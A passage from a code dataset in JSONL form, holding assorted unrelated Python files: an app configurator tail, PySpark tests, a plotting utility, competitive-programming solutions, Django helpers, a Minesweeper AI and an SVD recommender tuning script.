Dialogs.ask(translate(\"Reconfigure\", \"Other Hamsi Manager Was Detected\"),\n str(translate(\"Reconfigure\",\n \"Other Hamsi Manager executable file was detected. Are you want to delete old executable file? 
You can delete this old executable file : \\\"%s\\\"\")) % (\n oldPathOfExecutableHamsi))\n if answer != Dialogs.Yes:\n fu.removeFile(oldPathOfExecutableHamsi)\n if fu.isDir(\"/usr/share/applications/\"):\n fileContent = MyConfigure.getConfiguredDesktopFileContent()\n fu.writeToFile(\"/usr/share/applications/HamsiManager.desktop\", fileContent)\n if uni.isRunningAsRoot() is False:\n if fu.isDir(fu.joinPath(fu.userDirectoryPath, \".local\", \"applications\")) is False:\n fu.makeDirs(fu.joinPath(fu.userDirectoryPath, \".local\", \"applications\"))\n fileContent = MyConfigure.getConfiguredDesktopFileContent()\n fu.writeToFile(fu.joinPath(fu.userDirectoryPath, \".local\", \"applications\", \"HamsiManager.desktop\"),\n fileContent)\n MyConfigure.installKDE4Languages()\n self.isInstallFinished = True\n except:\n ReportBug.ReportBug()\n \n \n \n","repo_name":"supermurat/hamsi-manager","sub_path":"Tools/Configurator.py","file_name":"Configurator.py","file_ext":"py","file_size_in_byte":18302,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"16009433088","text":"import datetime\nimport time\nfrom collections import namedtuple\nimport json\nimport findspark\nfindspark.init()\nfrom pyspark import SparkContext, SparkConf\nfrom pyspark.conf import SparkConf\nfrom pyspark.sql import SparkSession, HiveContext\nfrom utils.spark_utils import insertHive\nfrom pyspark.accumulators import Accumulator\n\ndef print_tuple(x):\n tuple_list = []\n for item in x[1]:\n tuple_list.append(item)\n print((x[0], tuple_list))\n\ndef print_rdd(x):\n print(x)\n\ndef requirement1():\n sparkSession = (SparkSession\n .builder\n .appName('example-pyspark-read-and-write-from-hive')\n .config(\"hive.metastore.uris\", \"thrift://localhost:9083\", conf=SparkConf())\n .enableHiveSupport()\n .getOrCreate()\n )\n user_action_rdd = sparkSession.sql(\"select * from user_visit_action_table\").rdd\n\n session_to_action_rdd = user_action_rdd.map(lambda x: (x.session_id, x))\n session_to_action_group = session_to_action_rdd.groupByKey()\n\n session_to_action_group.foreach(print_tuple)\n\n sparkSession.stop()\n\n# requirement1()\n# a = 1 + 3 if 1 < 2 \\\n# and 2 < 3 else 2\n#\n# print(a)\ndef time_earlier(time1, time2):\n # time1 = '2021-01-27 4:34:30'\n # time2 = '2021-01-27 4:35:06'\n\n time1 = get_time_tuple(time1)\n time2 = get_time_tuple(time2)\n\n time1 = datetime.datetime(int(time1[0]), int(time1[1]), int(time1[2]), int(time1[3]), int(time1[4]), int(time1[5]))\n time2 = datetime.datetime(int(time2[0]), int(time2[1]), int(time2[2]), int(time2[3]), int(time2[4]), int(time2[5]))\n\n return time1 < time2\n\ndef get_time_tuple(time):\n time_date = time.split(' ')[0].split('-')\n time_hour_to_second = time.split(' ')[1].split(':')\n\n return (time_date[0], time_date[1], time_date[2], time_hour_to_second[0], time_hour_to_second[1], time_hour_to_second[2])\n\ndef get_datetime_minus_second(time1, time2):\n d1 = datetime.datetime.strptime(time1, '%Y-%m-%d %H:%M:%S')\n d2 = datetime.datetime.strptime(time2, '%Y-%m-%d %H:%M:%S')\n\n delta = d2 - d1\n return delta.seconds\n\nsparkSession = (SparkSession\n .builder\n .appName('example-pyspark-read-and-write-from-hive')\n .config(\"hive.metastore.uris\", \"thrift://localhost:9083\", conf=SparkConf())\n .enableHiveSupport()\n .getOrCreate()\n )\ndf1 = sparkSession.createDataFrame(data=[(1,2),(3,4)],schema=['a','b'])\ndf2 = sparkSession.createDataFrame(data=[(1,2),(5,6)],schema=['a','b'])\ndf3 = df1.intersect(df2)\ndf3.show()\n# 
requirement1()\n# print(get_datetime_minus_second('2021-01-27 4:34:30','2021-01-27 4:35:06'))\n# print(1 >= 1)\n# res = [i * 300 for i in range(20)]\n# print(res)\n# a = {'one' : 1, 'two' : 2}\n# b = {'one' : 1, 'two' : 2}\n# print(a ==b)\n#\n# def a():\n# def b():\n# print(c)\n# c = 5\n# b()\n# a()\n# requirement1()\n# a = [1,2,3]\n#\n# b = (4,5,6)\n# c = dict(zip(b,a))\n# print(c)\n# s = \"1234\"\n# print(s[0:-3])\n\n","repo_name":"gef0604/E-commerce-Django-PySpark","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41254913706","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\n\n# A function to plot running speed during gray periods\ndef plot_running_speed_gray_periods(expt_group, session_name, gray_period=5 * 60):\n \"\"\"Plot running speed during gray periods.\n\n Parameters\n ----------\n expt_group : ExperimentGroup\n ExperimentGroup object.\n ession_name : str\n Name of the session, as in the Experiment Object\n gray_period : int, optional\n Length of gray period in seconds, by default 5 * 60\n\n Returns\n -------\n matplotlib.figure.Figure\n Figure object.\n \"\"\"\n # Plot running speed during gray periods\n oeids = expt_group.expt_table.query(\n 'session_name==@session_name').index.values\n # Use 1st expt for the session (running is session-specific, same across experiments)\n exp = expt_group.experiments[oeids[0]]\n\n timepoints = exp.running_speed.timestamps.values\n speed = exp.running_speed.speed.values\n pregray_inds = np.where(timepoints < gray_period)[0]\n\n stim_df = exp.stimulus_presentations\n last_stim_end_time = stim_df.stop_time.values[-1]\n post_gray_end_time = last_stim_end_time + gray_period\n # get timepoints after last stimulus presentation and before gray period ends\n postgray_inds = np.where((timepoints > last_stim_end_time) & (\n timepoints < post_gray_end_time))[0]\n fig, ax = plt.subplots(figsize=(10, 4))\n ax.plot(timepoints[pregray_inds] - timepoints[pregray_inds[0]],\n speed[pregray_inds], label='pre-task gray')\n ax.plot(timepoints[postgray_inds] - timepoints[postgray_inds[0]],\n speed[postgray_inds], label='post-task gray')\n ax.set_xlabel('time (s)')\n ax.set_ylabel('speed (cm/s)')\n ax.set_title(f'{session_name}\\nrunning speed during gray periods')\n ax.legend()\n return fig\n","repo_name":"AllenInstitute/brain_observatory_analysis","sub_path":"brain_observatory_analysis/behavior/plot_running.py","file_name":"plot_running.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"24025420578","text":"str = input()\nres = []\nif str.isupper() or (str[0].islower() and str[1:].isupper()):\n for i in str:\n if i.isupper(): res.append(i.lower())\n else: res.append(i.upper())\n print(\"\".join(res))\nelif len(str) == 1:\n print(str.upper())\nelse: \n print(str)","repo_name":"ManishAradwad/Competitive-Programming","sub_path":"Codeforces/CapsLock(131A).py","file_name":"CapsLock(131A).py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27158356151","text":"from nnoir.functions import *\nfrom .utils import *\n\n\nclass OpAdd(Op):\n\n def __init__(self, node, *args):\n super(OpAdd, self).__init__(node, *args)\n\n def to_function(self, env, constants):\n [a, b] = self.node.input\n\n def constant_add(v, 
w):\n internal_node = gen_unregisterd_node_name(env)\n register_node(env, internal_node, env[w])\n return [\n Constant([], [internal_node], value=constants[w]),\n Add([v, internal_node], list(self.node.output))\n ]\n\n if a in constants and b not in constants:\n return constant_add(b, a)\n elif a not in constants and b in constants:\n return constant_add(a, b)\n elif a not in constants and b not in constants:\n return [Add(list(self.node.input), list(self.node.output))]\n else:\n raise UnsupportedONNXOperation(self.node, 'bug! (unreachable here)')\n","repo_name":"lflyme/nnoir","sub_path":"nnoir-onnx/nnoir_onnx/operators/add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"1296677237","text":"#!/usr/bin/env python3\n\nimport datetime\nimport lib.donations\nimport sys\nimport yaml\nfrom lib.objects_to_sheet import ObjectsToSheet\nfrom lib.tracking import Tracking\nfrom lib.tracking_output import TrackingOutput\nfrom typing import Any\n\nfrom lib.tracking_uploader import TrackingUploader\n\nCONFIG_FILE = \"config.yml\"\nwith open(CONFIG_FILE, 'r') as config_file_stream:\n config = yaml.safe_load(config_file_stream)\n\n\ndef get_group(header, row) -> Any:\n address = row[header.index(\"Shipping Address\")]\n address = address.upper()\n for group in config['groups'].keys():\n group_conf = config['groups'][group]\n reconcile = bool(group_conf['reconcile']) if 'reconcile' in group_conf else True\n group_keys = config['groups'][group]['keys']\n if isinstance(group_keys, str):\n group_keys = [group_keys]\n for group_key in group_keys:\n if str(group_key).upper() in address:\n return group, reconcile\n print(\"No group from row:\")\n print(row)\n return None, True\n\n\ndef from_amazon_row(header, row) -> Tracking:\n tracking = str(row[header.index('Carrier Tracking #')]).upper()\n orders = {row[header.index('Order ID')].upper()}\n price = float(\n str(row[header.index('Shipment Subtotal')]).replace(',',\n '').replace('$',\n '').replace('N/A', '0.0'))\n to_email = row[header.index(\"Account User Email\")]\n original_ship_date = str(row[header.index(\"Shipment Date\")])\n try:\n ship_date = datetime.datetime.strptime(\n original_ship_date, \"%m/%d/%Y\").strftime(\"%Y-%m-%d\") if original_ship_date != 'N/A' else ''\n except:\n try:\n ship_date = (datetime.date(year=1899, day=29, month=12) +\n datetime.timedelta(days=int(original_ship_date))).strftime('%Y-%m-%d')\n except:\n ship_date = \"n/a\"\n group, reconcile = get_group(header, row)\n if group is None:\n return None\n tracked_cost = 0.0\n items = row[header.index(\"Title\")] + \" Qty:\" + str(row[header.index(\"Item Quantity\")])\n merchant = row[header.index('Merchant')] if 'Merchant' in header else 'Amazon'\n return Tracking(\n tracking,\n group,\n orders,\n price,\n to_email,\n ship_date=ship_date,\n tracked_cost=tracked_cost,\n items=items,\n merchant=merchant,\n reconcile=reconcile)\n\n\ndef find_candidate(tracking, candidates) -> Any:\n for candidate in candidates:\n if tracking.tracking_number == candidate.tracking_number:\n return candidate\n return None\n\n\ndef dedupe_trackings(trackings) -> list:\n result = []\n for tracking in trackings:\n candidate = find_candidate(tracking, result)\n if candidate:\n candidate.order_ids = set(candidate.order_ids)\n candidate.order_ids.update(tracking.order_ids)\n if candidate.price:\n candidate.price = float(candidate.price) + tracking.price\n candidate.items += \",\" + tracking.items\n 
else:\n result.append(tracking)\n return result\n\n\ndef get_required(prompt):\n result = \"\"\n while not result:\n result = str(input(prompt)).strip()\n return result\n\n\ndef main():\n sheet_id = get_required(\"Enter Google Sheet ID: \")\n tab_name = get_required(\"Enter the name of the tab within the sheet: \")\n objects_to_sheet = ObjectsToSheet()\n all_trackings = objects_to_sheet.download_from_sheet(from_amazon_row, sheet_id, tab_name)\n\n num_n_a_trackings = len(\n [ignored for ignored in all_trackings if ignored and ignored.tracking_number == 'N/A'])\n num_empty_trackings = len(\n [ignored for ignored in all_trackings if ignored and ignored.tracking_number == ''])\n print(\n f'Skipping {num_n_a_trackings} for n/a tracking column and {num_empty_trackings} for empty tracking column'\n )\n all_trackings = [\n tracking for tracking in all_trackings\n if tracking and tracking.tracking_number != 'N/A' and tracking.tracking_number != ''\n ]\n len_non_reconcilable_trackings = len([t for t in all_trackings if not t.reconcile])\n print(f'Skipping {len_non_reconcilable_trackings} non-reconcilable trackings')\n all_trackings = [t for t in all_trackings if t.reconcile]\n base_len_trackings = len(all_trackings)\n all_trackings = dedupe_trackings(all_trackings)\n print(f'Filtered {base_len_trackings - len(all_trackings)} duplicate trackings from the sheet')\n\n print('Uploading trackings...')\n tracking_uploader = TrackingUploader(config)\n tracking_uploader.upload_trackings(all_trackings)\n\n tracking_output = TrackingOutput(config)\n print(\"Number of trackings beforehand: %d\" % len(tracking_output.get_existing_trackings()))\n print(\"Number from sheet: %d\" % len(all_trackings))\n tracking_output.save_trackings(all_trackings)\n print(\"Number of trackings after: %d\" % len(tracking_output.get_existing_trackings()))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"gomberg5264/order-tracking","sub_path":"import_report.py","file_name":"import_report.py","file_ext":"py","file_size_in_byte":4839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5299348733","text":"from django.core.management.base import BaseCommand, CommandError\r\nfrom old.models import ShopCategory\r\nfrom shop.models import Category\r\n\r\n\r\n\r\nclass Command(BaseCommand):\r\n\r\n def handle(self, *args, **options):\r\n for c in ShopCategory.objects.using('old').all().order_by('-parent_id'):\r\n category = Category.objects.filter(slug=c.slug).first()\r\n if not category:\r\n category = Category(pk=c.pk)\r\n\r\n category.name = c.name\r\n category.slug = c.slug\r\n category.title = c.title\r\n category.description = c.metadesc\r\n category.keywords = c.metakey\r\n if c.parent_id:\r\n parent = Category.objects.filter(pk=c.parent_id).first()\r\n if parent:\r\n category.parent = parent\r\n category.image = c.image\r\n category.save()\r\n print(category.id)\r\n ","repo_name":"webmagicc/simple-django-shop","sub_path":"old/management/commands/import_categories.py","file_name":"import_categories.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"21"} +{"seq_id":"42390793023","text":"#!/usr/local/bin/python3\n\ndef main():\n arr = []\n with open('input.txt', 'r') as f:\n for line in f:\n arr.append(int(line.rstrip()))\n\n tot = 0\n prev_window = 1000000000\n\n for n in range(len(arr)-2):\n window = sum(arr[n:n+3])\n# print(window, prev_window)\n if window > prev_window:\n tot 
+= 1\n prev_window = window\n print(tot)\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"nico-castro/advent-of-code","sub_path":"2021/1/q2_answer.py","file_name":"q2_answer.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36406422733","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nfrom decimal import Decimal\nfrom django import forms\n\n\nclass ExtFileField(forms.FileField):\n \"\"\"\n * max_upload_size - a number indicating the maximum file size allowed for upload.\n 500Kb - 524288\n 1MB - 1048576\n 2.5MB - 2621440\n 5MB - 5242880\n 10MB - 10485760\n 20MB - 20971520\n 50MB - 5242880\n 100MB 104857600\n 250MB - 214958080\n 500MB - 429916160\n t = ExtFileField(ext_whitelist=(\".pdf\", \".txt\"), max_upload_size=)\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n ext_whitelist = kwargs.pop(\"ext_whitelist\")\n self.ext_whitelist = [i.lower() for i in ext_whitelist]\n self.max_upload_size = kwargs.pop(\"max_upload_size\")\n super(ExtFileField, self).__init__(*args, **kwargs)\n\n def clean(self, *args, **kwargs):\n upload = super(ExtFileField, self).clean(*args, **kwargs)\n if upload:\n size = upload.size\n filename = upload.name\n ext = os.path.splitext(filename)[1]\n ext = ext.lower()\n\n if size == 0 or ext not in self.ext_whitelist or size > self.max_upload_size:\n raise forms.ValidationError(\"Tipo de fichero o tamanno no permitido!\")\n\n\nclass NeuralCSVForm(forms.Form):\n csv = ExtFileField(label=u'CSV File', ext_whitelist=\".csv\", max_upload_size=2621440)\n","repo_name":"georgenavarro1802/neural3","sub_path":"nn/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29375776782","text":"import itertools\nimport random\n\n\nclass Minesweeper():\n \"\"\"\n Minesweeper game representation\n \"\"\"\n\n def __init__(self, height=8, width=8, mines=8):\n\n # Set initial width, height, and number of mines\n self.height = height\n self.width = width\n self.mines = set()\n\n # Initialize an empty field with no mines\n self.board = []\n for i in range(self.height):\n row = []\n for j in range(self.width):\n row.append(False)\n self.board.append(row)\n\n # Add mines randomly\n while len(self.mines) != mines:\n i = random.randrange(height)\n j = random.randrange(width)\n if not self.board[i][j]:\n self.mines.add((i, j))\n self.board[i][j] = True\n\n # At first, player has found no mines\n self.mines_found = set()\n\n def print(self):\n \"\"\"\n Prints a text-based representation\n of where mines are located.\n \"\"\"\n for i in range(self.height):\n print(\"--\" * self.width + \"-\")\n for j in range(self.width):\n if self.board[i][j]:\n print(\"|X\", end=\"\")\n else:\n print(\"| \", end=\"\")\n print(\"|\")\n print(\"--\" * self.width + \"-\")\n\n def is_mine(self, cell):\n try:\n i, j = cell\n except Exception as ex:\n print(cell)\n raise ex\n return self.board[i][j]\n\n def nearby_mines(self, cell):\n \"\"\"\n Returns the number of mines that are\n within one row and column of a given cell,\n not including the cell itself.\n \"\"\"\n\n # Keep count of nearby mines\n count = 0\n\n # Loop over all cells within one row and column\n for i in range(cell[0] - 1, cell[0] + 2):\n for j in range(cell[1] - 1, cell[1] + 2):\n\n # Ignore the cell itself\n if (i, j) == cell:\n continue\n\n # Update count if cell in bounds and is mine\n if 
0 <= i < self.height and 0 <= j < self.width:\n if self.board[i][j]:\n count += 1\n\n return count\n\n def won(self):\n \"\"\"\n Checks if all mines have been flagged.\n \"\"\"\n return self.mines_found == self.mines\n\n\nclass Sentence():\n \"\"\"\n Logical statement about a Minesweeper game\n A sentence consists of a set of board cells,\n and a count of the number of those cells which are mines.\n \"\"\"\n\n def __init__(self, cells, count):\n self.cells = set(cells)\n self.count = count\n\n def __eq__(self, other):\n return self.cells == other.cells and self.count == other.count\n\n def __str__(self):\n return f\"{self.cells} = {self.count}\"\n\n def known_mines(self):\n \"\"\"\n Returns the set of all cells in self.cells known to be mines.\n \"\"\"\n return self.cells if self.count == len(self.cells) else set()\n\n def known_safes(self):\n \"\"\"\n Returns the set of all cells in self.cells known to be safe.\n \"\"\"\n return self.cells if self.count == 0 else set()\n\n def mark_mine(self, cell):\n \"\"\"\n Updates internal knowledge representation given the fact that\n a cell is known to be a mine.\n \"\"\"\n if cell in self.cells:\n self.cells.remove(cell)\n self.count -= 1\n\n def mark_safe(self, cell):\n \"\"\"\n Updates internal knowledge representation given the fact that\n a cell is known to be safe.\n \"\"\"\n if cell in self.cells:\n self.cells.remove(cell)\n\n\nclass MinesweeperAI():\n \"\"\"\n Minesweeper game player\n \"\"\"\n\n def __init__(self, height=8, width=8):\n\n # Set initial height and width\n self.height = height\n self.width = width\n\n # Keep track of which cells have been clicked on\n self.moves_made = set()\n\n # Keep track of cells known to be safe or mines\n self.mines = set()\n self.safes = set()\n\n # List of sentences about the game known to be true\n self.knowledge = []\n\n def mark_mine(self, cell):\n \"\"\"\n Marks a cell as a mine, and updates all knowledge\n to mark that cell as a mine as well.\n \"\"\"\n self.mines.add(cell)\n print(\"*** *** mark mine:\", cell)\n for sentence in self.knowledge:\n sentence.mark_mine(cell)\n\n def mark_safe(self, cell):\n \"\"\"\n Marks a cell as safe, and updates all knowledge\n to mark that cell as safe as well.\n \"\"\"\n self.safes.add(cell)\n for sentence in self.knowledge:\n sentence.mark_safe(cell)\n\n def compute_knowledge_coords(self):\n return set(itertools.chain.from_iterable(sentence.cells for sentence in self.knowledge))\n\n def add_knowledge(self, cell, count):\n \"\"\"\n Called when the Minesweeper board tells us, for a given\n safe cell, how many neighboring cells have mines in them.\n\n This function should:\n 1) mark the cell as a move that has been made\n 2) mark the cell as safe\n 3) add a new sentence to the AI's knowledge base\n based on the value of `cell` and `count`\n 4) mark any additional cells as safe or as mines\n if it can be concluded based on the AI's knowledge base\n 5) add any new sentences to the AI's knowledge base\n if they can be inferred from existing knowledge\n \"\"\"\n\n # 1 • The function should mark the cell as one of the moves made in the game.\n self.moves_made.add(cell)\n\n # 2 • The function should mark the cell as a safe cell, updating any sentences that contain the cell as well.\n self.mark_safe(cell)\n\n # 3 • The function should add a new sentence to the AI’s knowledge base, based on the value of cell and count, to indicate that count of the cell’s neighbors are mines. 
Be sure to only include cells whose state is still undetermined in the sentence.\n x, y = cell\n adjacent_cells = {\n (i, j)\n for i in range(x-1, x+1+1)\n for j in range(y-1, y+1+1)\n if 0 <= i and i < self.height\n and 0 <= j and j < self.width\n }\n adjacent_cells -= {cell}\n\n # exclude known mines\n valid_adjacent_cells = adjacent_cells - self.mines\n # deduct (number of known mines excluded) from count!\n new_count = count - (len(adjacent_cells) - len(valid_adjacent_cells))\n\n # exclude known safes\n valid_adjacent_cells -= self.safes\n\n if len(valid_adjacent_cells) > 0:\n self.knowledge.append(\n Sentence(valid_adjacent_cells, new_count)) # use new_count!\n\n # \"Updating\" involves checking each sentence for known mines / safes, and marking them on all sentences.\n def update_knowledge(sentence_list):\n unmarked_safes = set()\n unmarked_mines = set()\n\n # accumulate unmarked mines and safes\n for sentence in sentence_list:\n sentence_size = len(sentence.cells)\n if sentence_size == 0:\n self.knowledge.remove(sentence)\n continue\n known_safes = sentence.known_safes()\n if len(known_safes) > 0:\n unmarked_safes |= known_safes\n self.knowledge.remove(sentence)\n continue\n known_mines = sentence.known_mines()\n if len(known_mines) > 0:\n unmarked_mines |= known_mines\n self.knowledge.remove(sentence)\n\n # return the fact that no changes are needed\n if len(unmarked_mines) == 0 and len(unmarked_safes) == 0:\n return False\n\n # update knowledge\n self.mines |= unmarked_mines\n self.safes |= unmarked_safes\n for mine in unmarked_mines:\n self.mark_mine(mine)\n for safe in unmarked_safes:\n self.mark_safe(safe)\n\n # return the fact that changes have been made\n return True\n\n # Keep looping until knowledge is updated completely.\n count = 0\n max = 99\n print()\n while True:\n print(\"loop count:\", count)\n if count >= max:\n print(f\"looped to maximum of {max} times\")\n break\n count += 1\n # 4 • If, based on any of the sentences in self.knowledge, new cells can be marked as safe or as mines, then the function should do so.\n\n is_changes_made1 = update_knowledge(self.knowledge)\n\n # 5 • If, based on any of the sentences in self.knowledge, new sentences can be inferred (using the subset method described in the Background), then those sentences should be added to the knowledge base as well.\n\n # detect overlapping sentences, for each relevant coordinate\n overlaps_per_coord = dict()\n for coord in self.compute_knowledge_coords():\n # print(coord)\n overlaps = []\n uniques = set()\n for sentence in self.knowledge:\n cells = frozenset(sentence.cells)\n count = sentence.count\n if coord in cells:\n if (cells, count) not in uniques:\n overlaps.append(sentence)\n uniques.add((cells, count))\n else:\n # remove duplicate sentence\n self.knowledge.remove(sentence)\n if len(overlaps) >= 2:\n overlaps_per_coord[coord] = overlaps\n # # debug print\n # for k,v in overlaps_per_coord.items():\n # print(k,v)\n\n # employing subset method with each sentence pair permutation\n permutations_per_coord = dict()\n for coord, overlaps in overlaps_per_coord.items():\n permutations_per_coord[coord] = itertools.permutations(\n overlaps, 2)\n # # debug print\n # for k,v in permutations_per_coord.items():\n # print(k,v)\n\n # stored as hashable tuples instead of Sentence(), to eliminate duplicates\n new_sentences = set()\n\n for coord, permutations in permutations_per_coord.items():\n print(\"subset technique for:\", coord, end=\" \")\n for j, (left, right) in enumerate(permutations):\n if left.cells < 
right.cells:\n print(f\"\\n{j}\", end=\" \")\n new_sentence_tuple = ( # needs to be hashable\n frozenset(right.cells - left.cells),\n right.count - left.count\n )\n print(new_sentence_tuple, end=\" \")\n new_sentences.add(new_sentence_tuple)\n else:\n print(j, end=\" \")\n print(\"\\n\")\n # left.cells == right.cells can be ignored because the result will be empty set with 0 count\n\n new_sentences = list(map(\n lambda tuple: Sentence(tuple[0], tuple[1]),\n new_sentences\n ))\n\n if len(new_sentences) > 0:\n print(\"__add subset technique new sentences__\")\n for ns in new_sentences:\n print(ns)\n\n self.knowledge += new_sentences\n # only new sentences need to be updated here\n if len(new_sentences) > 0:\n print(\"update knowledge (new sentences)\")\n is_changes_made_2 = update_knowledge(new_sentences)\n else:\n is_changes_made_2 = False\n\n is_changes_made = is_changes_made1 or is_changes_made_2\n\n # no changes made means loop can stop\n if is_changes_made is False:\n break\n print(\"___knowledge___\")\n for sentence in self.knowledge:\n print(sentence)\n print(\"___mines___\")\n print(self.mines)\n print(\"___safe moves___\")\n print(self.safes - self.moves_made)\n\n def make_safe_move(self):\n \"\"\"\n Returns a safe cell to choose on the Minesweeper board.\n The move must be known to be safe, and not already a move\n that has been made.\n\n This function may use the knowledge in self.mines, self.safes\n and self.moves_made, but should not modify any of those values.\n \"\"\"\n possible_set = (self.safes - self.moves_made)\n move = next(iter(possible_set)) if len(possible_set) > 0 else None\n\n if move is not None:\n print()\n print(\"-->\", move)\n return move\n\n def compute_possible_set(self):\n return (\n set(itertools.product(range(self.height), range(self.width)))\n - self.moves_made\n - self.mines\n )\n\n def make_random_move(self):\n \"\"\"\n Returns a move to make on the Minesweeper board.\n Should choose randomly among cells that:\n 1) have not already been chosen, and\n 2) are not known to be mines\n \"\"\"\n possible_set = self.compute_possible_set()\n\n if len(possible_set) == 0:\n return None\n\n move = random.sample(possible_set, 1)[0]\n\n for _ in range(5):\n print(\"*\")\n print(\"??-->\", move)\n return move\n","repo_name":"2jacobtan/CS50ai","sub_path":"1b minesweeper/minesweeper.py","file_name":"minesweeper.py","file_ext":"py","file_size_in_byte":13730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15512961394","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport scipy.optimize\n\nfrom evaluators.recommender_evaluator import RecommenderEvaluator\nfrom predictors.svd_predictor import SVDPredictor, prepare_df_svd\nfrom validators.k_fold_validator import KFoldValidator\n\nimport logging\nfrom logger import logger\n\ndef main():\n\n df = prepare_df_svd(\"data/training_set.csv\")\n\n predictor_target = \"weighted_relevance\"\n evaluator_target = \"relevance\"\n row_attribute = \"srch_id\"\n column_attribute = \"prop_id\"\n similarity_attributes = [\"srch_length_of_stay\", \"srch_booking_window\", \"srch_adults_count\", \"srch_children_count\", \"srch_room_count\"]\n\n optimal_weights = optimize_weights_NM(df, predictor_target, evaluator_target, row_attribute, column_attribute, similarity_attributes)\n # optimal_weights = []\n optimal_n_clusters = optimize_n_clusters(df, predictor_target, evaluator_target, row_attribute, column_attribute, similarity_attributes, 
optimal_weights)\n optimal_n_svd_dimensions = optimize_n_svd_dimensions(df, predictor_target, evaluator_target, row_attribute, column_attribute, similarity_attributes, optimal_weights, optimal_n_clusters)\n\n logger.info(f\"Optimal {optimal_weights}, {optimal_n_clusters}, {optimal_n_svd_dimensions}\")\n\ndef set_df_types(df):\n \n categorical_columns = [\n \"srch_id\",\n \"prop_id\",\n \"click_bool\",\n \"booking_bool\",\n ] \n\n df[categorical_columns] = df[categorical_columns].astype(\"category\")\n\n return df\n\ndef optimize_weights(df, predictor_target, evaluator_target, row_attribute, column_attribute, similarity_attributes):\n\n def get_initial_weights():\n predictor = SVDPredictor(predictor_target, row_attribute, column_attribute, row_similarity_attributes=similarity_attributes)\n predictor.training_df = df\n return predictor.compute_row_similarity_weights()\n\n def validate_svd_recommender(similarity_weights):\n \n predictor = SVDPredictor(predictor_target, row_attribute, column_attribute,\n row_similarity_attributes=similarity_attributes,\n row_similarity_weights=similarity_weights)\n \n evaluator = RecommenderEvaluator(evaluator_target, predictor, predictor.row_attribute)\n validator = KFoldValidator(df, evaluator, predictor, n_folds=2)\n score, std_error = validator.validate()\n\n logger.setLevel(logging.PROGRESS)\n logger.progress(f\"Score: {score} +- {std_error}. weights: {similarity_weights}\")\n logger.setLevel(logging.INFO)\n\n return -score\n\n initial_weights = get_initial_weights()\n # validate_svd_recommender(initial_weights)\n\n response = scipy.optimize.minimize(validate_svd_recommender, initial_weights)\n\n optimal_weights = response.x\n\n validate_svd_recommender(optimal_weights)\n\n return optimal_weights\n\ndef optimize_weights_NM(df, predictor_target, evaluator_target, row_attribute, column_attribute, similarity_attributes):\n \n def get_initial_weights():\n predictor = SVDPredictor(predictor_target, row_attribute, column_attribute, row_similarity_attributes=similarity_attributes)\n predictor.training_df = df\n return predictor.compute_row_similarity_weights()\n \n def get_initial_complex(initial_weights):\n \n initial_weights = initial_weights / 2\n N = len(initial_weights)\n\n simplex = np.empty((N + 1, N), dtype=initial_weights.dtype)\n simplex[0] = initial_weights\n for k in range(N):\n y = np.array(initial_weights, copy=True)\n if y[k] != 0:\n y[k] = 4*y[k]\n else:\n y[k] = 0.001\n \n simplex[k + 1] = y\n\n return simplex\n\n def validate_svd_recommender(similarity_weights):\n \n similarity_weights[similarity_weights < 0] = 0\n\n predictor = SVDPredictor(predictor_target, row_attribute, column_attribute,\n row_similarity_attributes=similarity_attributes,\n row_similarity_weights=similarity_weights)\n \n evaluator = RecommenderEvaluator(column_attribute, predictor, row_attribute, evaluator_target)\n validator = KFoldValidator(df, evaluator, predictor, n_folds=2)\n score, std_error = validator.validate()\n\n logger.setLevel(logging.PROGRESS)\n logger.progress(f\"Score: {score} +- {std_error}. 
weights: {similarity_weights}\")\n logger.setLevel(logging.INFO)\n\n return -score\n\n logger.status(\"Starting optimization procedure\")\n logger.setLevel(logging.INFO)\n\n initial_weights = get_initial_weights()\n\n validate_svd_recommender(initial_weights)\n\n initial_simplex = get_initial_complex(initial_weights)\n\n response = scipy.optimize.fmin(validate_svd_recommender, initial_weights, initial_simplex=initial_simplex, full_output=True, maxfun=50)\n\n initial_score = validate_svd_recommender(initial_weights)\n optimal_weights, minimum = response[0], response[1]\n \n logger.info(f\"Initial score: {-initial_score}. weights: {initial_weights}\")\n logger.info(f\"Optimized score: {-minimum}. weights: {optimal_weights}\")\n\n return optimal_weights\n\n\ndef plot_between(x, y, yerror):\n\n x, y, yerror = np.array(x), np.array(y), np.array(yerror)\n\n plt.plot(x, y)\n plt.fill_between(x, y - yerror, y + yerror, alpha=0.2)\n\n \ndef optimize_n_clusters(df, predictor_target, evaluator_target, row_attribute, column_attribute, similarity_attributes, similarity_weights, show=False):\n\n cluster_sizes = range(2, 20)\n\n scores, errors = [], []\n for n_clusters in cluster_sizes:\n logger.setLevel(logging.PROGRESS)\n logger.progress(f\"Current cluster size {n_clusters}\")\n logger.setLevel(logging.INFO)\n\n predictor = SVDPredictor(predictor_target, row_attribute, column_attribute, row_similarity_attributes=similarity_attributes, row_similarity_weights=similarity_weights,\n 